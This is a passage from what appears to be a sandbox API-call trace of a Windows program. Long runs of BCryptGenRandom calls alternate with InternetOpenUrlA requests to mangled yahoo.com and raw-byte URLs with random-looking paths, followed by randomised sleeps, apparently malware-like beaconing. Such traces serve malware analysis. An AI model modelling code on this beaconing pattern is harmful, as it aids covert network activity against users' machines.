(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0247.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.870] GetProcessHeap () returned 0x440000 [0247.870] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0247.870] lstrcpyA (in: lpString1=0x472f30, lpString2="M'óts://www.yahoo.com" | out: lpString1="M'óts://www.yahoo.com") returned="M'óts://www.yahoo.com" [0247.870] lstrcatA (in: lpString1="M'óts://www.yahoo.com", lpString2="/1bD7g5id5su4i3apn221aqdtyt26Sxi8emm4zm/" | out: lpString1="M'óts://www.yahoo.com/1bD7g5id5su4i3apn221aqdtyt26Sxi8emm4zm/") returned="M'óts://www.yahoo.com/1bD7g5id5su4i3apn221aqdtyt26Sxi8emm4zm/" [0247.870] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0247.870] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="M'óts://www.yahoo.com/1bD7g5id5su4i3apn221aqdtyt26Sxi8emm4zm/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0247.870] GetProcessHeap () returned 0x440000 [0247.870] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0247.870] GetProcessHeap () returned 0x440000 [0247.870] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f4fb0 | out: hHeap=0x440000) returned 1 [0247.871] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0247.871] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0247.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0247.871] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0247.871] Sleep (dwMilliseconds=0x109dc) [0247.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0247.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.996] GetProcessHeap () returned 0x440000 [0247.996] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f4e30 [0247.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f4e31, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x4f4e31) returned 0x0 [0247.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.002] GetProcessHeap () returned 0x440000 [0248.002] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0248.002] lstrcpyA (in: lpString1=0x472f30, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0248.002] lstrcatA (in: lpString1="\x81\x03", lpString2="/o4z16742rajbpv65137jwg/" | out: lpString1="\x81\x03/o4z16742rajbpv65137jwg/") returned="\x81\x03/o4z16742rajbpv65137jwg/" [0248.003] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0248.003] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/o4z16742rajbpv65137jwg/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0248.003] GetProcessHeap () returned 0x440000 [0248.003] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0248.003] GetProcessHeap () returned 0x440000 [0248.003] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f4e30 | out: hHeap=0x440000) returned 1 [0248.003] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0248.004] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0248.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0248.004] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0248.004] Sleep (dwMilliseconds=0x10faa) [0248.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0248.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.140] GetProcessHeap () returned 0x440000 [0248.140] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16f80 [0248.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16f81, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a16f81) returned 0x0 [0248.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16f9f, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a16f9f) returned 0x0 [0248.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.151] BCryptGenRandom (in: hAlgorithm=0x0, 